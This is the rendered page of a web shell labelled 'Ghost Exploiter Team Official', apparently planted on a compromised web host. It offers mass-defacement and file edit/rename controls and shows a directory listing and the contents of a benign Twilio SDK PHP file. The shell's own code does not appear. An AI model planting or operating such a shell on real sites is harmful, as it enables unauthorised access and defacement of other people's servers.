webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
TwiML
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Fax
--
ren
Messaging
--
ren
Video
--
ren
Voice
--
ren
FaxResponse.php
0.569KB
edt
ren
GenericNode.php
0.448KB
edt
ren
MessagingResponse.php
0.986KB
edt
ren
TwiML.php
3.455KB
edt
ren
VoiceResponse.php
5.604KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\TwiML; class MessagingResponse extends TwiML { /** * MessagingResponse constructor. */ public function __construct() { parent::__construct('Response', null); } /** * Add Message child. * * @param string $body Message Body * @param array $attributes Optional attributes * @return Messaging\Message Child element. */ public function message($body, $attributes = []): Messaging\Message { return $this->nest(new Messaging\Message($body, $attributes)); } /** * Add Redirect child. * * @param string $url Redirect URL * @param array $attributes Optional attributes * @return Messaging\Redirect Child element. */ public function redirect($url, $attributes = []): Messaging\Redirect { return $this->nest(new Messaging\Redirect($url, $attributes)); } }